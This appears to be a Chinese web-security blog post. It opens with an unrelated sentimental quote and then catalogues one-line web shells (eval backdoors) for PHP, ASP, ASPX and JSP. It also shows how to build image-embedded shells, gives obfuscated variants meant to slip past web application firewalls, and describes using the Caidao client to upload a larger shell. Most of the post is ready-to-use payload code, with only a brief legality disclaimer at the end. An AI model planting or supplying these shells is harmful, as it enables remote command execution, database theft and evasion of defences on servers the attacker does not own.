我和她说,如果有天你要离开我,你就跟我掰手腕,赢了你就让你走,她说我那么瘦小怎么会赢。后来她真的要和我分手,我把右手放在桌子上,眼看我要赢的时候,她把左手放到右手上,我抬头看她咬着牙眼里含着泪,我知道她真得要离开我了。。。
---- 网易云热评
一、一句话木马,隐蔽性强,功能强大,为上传大马做准备
1、php一句话
<?php @eval($_POST['aiyou']);?>将一句话上传到服务器
用菜刀连接
读取数据库
终端运行命令
2、asp一句话
<% eval request(“aiyou”) %>
3、aspx一句话
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”],“unsafe”);%>
4、jsp一句话
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
5、图片马
cmd下做一句话
copy /b1.jpg+1.php 2.jpg
C32ASM做一句话
二、一句话变形,waf会拦截一句话,可以通过变形绕过
<%eval(request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“aiyou”))%>
<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&-"&“5”&")"&")")%>
<%a=request(“aiyou”)%><%eval a%>
三、大马,功能比小马的功能更加强大
上传小马后用菜刀连接,然后再通过菜刀上传大马
禁止非法,后果自负
欢迎关注公众号:web安全工具库
